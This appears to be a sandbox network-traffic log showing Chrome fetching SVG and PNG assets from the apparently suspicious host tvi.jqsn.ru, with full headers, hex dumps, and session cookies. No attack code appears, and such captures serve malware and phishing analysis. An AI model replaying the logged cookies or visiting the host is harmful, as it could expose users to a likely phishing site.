                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:54 UTC755INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:54 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETzcy%2FzJP%2B4fWmFKSPO1bh1UYZkOYFImEmY0IoZmdwKJRzOZDcv%2BjR5OVtuDhUXyeSP%2BXB8Toik4NwLJoi2ZXE9Ss6AcaKNo4vpYspzpUsAczHbmcair%2B8GOmxxEoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f75d85ad94-ATL
                                                                                                                          2024-04-17 00:34:54 UTC614INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                          Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                          2024-04-17 00:34:54 UTC1369INData Raw: 32 39 20 34 33 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 34 33 2e 33 31 32 35 20 31 37 2e 33 33 37 31 20 34 31 2e 30 30 35 35 20 31 34 2e 31 39 34 36 20 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 43 33 37 2e 30 36 30 37 20 35 2e 32 37 31 34 38 20 33 31 2e 31 34 37 20 30 20 32 33 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20
                                                                                                                          Data Ascii: 29 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744
                                                                                                                          2024-04-17 00:34:54 UTC1369INData Raw: 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31
                                                                                                                          Data Ascii: 4.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C1
                                                                                                                          2024-04-17 00:34:54 UTC1369INData Raw: 34 30 2e 35 31 38 38 20 33 38 2e 37 30 37 32 4c 33 39 2e 34 31 30 32 20 33 36 2e 34 34 38 35 4c 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 5a 4d 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 36 2e 30 38 36 34 20 34 31 2e 34 38 32 32 4c 32 36 2e 30 38 36 31 20 34 31 2e 34 38 32 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39
                                                                                                                          Data Ascii: 40.5188 38.7072L39.4102 36.4485L35.8194 38.2109ZM28.1744 44.8939L26.0864 41.4822L26.0861 41.4824L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9
                                                                                                                          2024-04-17 00:34:54 UTC1369INData Raw: 35 36 33 20 34 33 2e 30 38 36 39 5a 4d 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 33 39 2e 33 31 32 35 20 32 37 2e 34 38 31 36 20 33 37 2e 33 36 35 33 20 33 36 2e 37 37 37 36 20 32 37 2e 30 36 35 32 20 34 33 2e 30 38 31 34 4c 33 31 2e 32 34 31 33 20 34 39 2e 39 30 35 43 34 34 2e 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33
                                                                                                                          Data Ascii: 563 43.0869ZM39.3125 21.1287C39.3125 27.4816 37.3653 36.7776 27.0652 43.0814L31.2413 49.905C44.7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3
                                                                                                                          2024-04-17 00:34:54 UTC1308INData Raw: 34 38 2e 32 39 35 5a 4d 31 37 2e 34 37 38 39 20 34 38 2e 32 39 32 37 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 32 31 2e 37 32 35 31 20 34 31 2e 35 31 32 36 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 31 37 2e 34 37 38 39 20 34 38 2e 32 39 32 37 5a 4d 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e
                                                                                                                          Data Ascii: 48.295ZM17.4789 48.2927L17.481 48.2941L21.7251 41.5126L21.723 41.5113L17.4789 48.2927ZM17.4868 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.
                                                                                                                          2024-04-17 00:34:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.449799104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1460OUTGET /wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:54 UTC760INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:54 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRAmc8hoXD7Ks7%2BOQmQ6jAPFt%2FoVqXG2joD0gCCQm%2FlyCE7e6lC%2Br%2FtfK9ZtYg7XeMKiW985RUReAbH749eD62GxQj03NFaa2b20ufo7Jor%2FPKBev5aIVfB%2B%2BPEWPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854f83f376732-ATL
                                                                                                                          2024-04-17 00:34:54 UTC609INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                                                          Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                                                          2024-04-17 00:34:54 UTC1369INData Raw: 2e 38 36 33 2c 33 34 2e 38 36 33 2c 30 2c 30 2c 31 2d 33 2e 36 2d 33 2e 31 35 33 2c 33 34 2e 36 2c 33 34 2e 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 37 2d 33 2e 36 30 36 2c 32 37 2e 37 31 37 2c 32 37 2e 37 31 37 2c 30 2c 30 2c 31 2d 32 2e 34 35 36 2d 33 2e 38 37 36 41 32 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c
                                                                                                                          Data Ascii: .863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,
                                                                                                                          2024-04-17 00:34:54 UTC934INData Raw: 31 2d 2e 39 36 37 2e 35 36 36 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2d 31 2e 32 31 31 2e 32 32 36 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 31 2e 33 33 33 2d 2e 32 37 2c 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 31 2e 31 32 34 2d 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35
                                                                                                                          Data Ascii: 1-.967.566,3.062,3.062,0,0,1-1.211.226,3.375,3.375,0,0,1-1.333-.27,3.52,3.52,0,0,1-1.124-.758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.35
                                                                                                                          2024-04-17 00:34:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.449800104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1464OUTGET /op9nJ96mWPUqO6569NQJB0Igha1bclYFfgOjFPonTi9mJHOHcd200 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:54 UTC754INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:54 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="op9nJ96mWPUqO6569NQJB0Igha1bclYFfgOjFPonTi9mJHOHcd200"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TtEZiP7c2gqq3cDQtOMnBerbaL5oQLmV69CeMoqnPMEBelPGQYb2iqxWBj11K3j6E6Tlfxn0ICo%2FXqrn7Rikm13OFgsAWSUtoaH0z9qyD%2BHQCf1U1T1%2FGOmbWVDVLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854fa2d52ad6b-ATL
                                                                                                                          2024-04-17 00:34:54 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                                                          Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                                                          2024-04-17 00:34:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.449801172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:52 UTC1116OUTGET /klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:55 UTC763INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
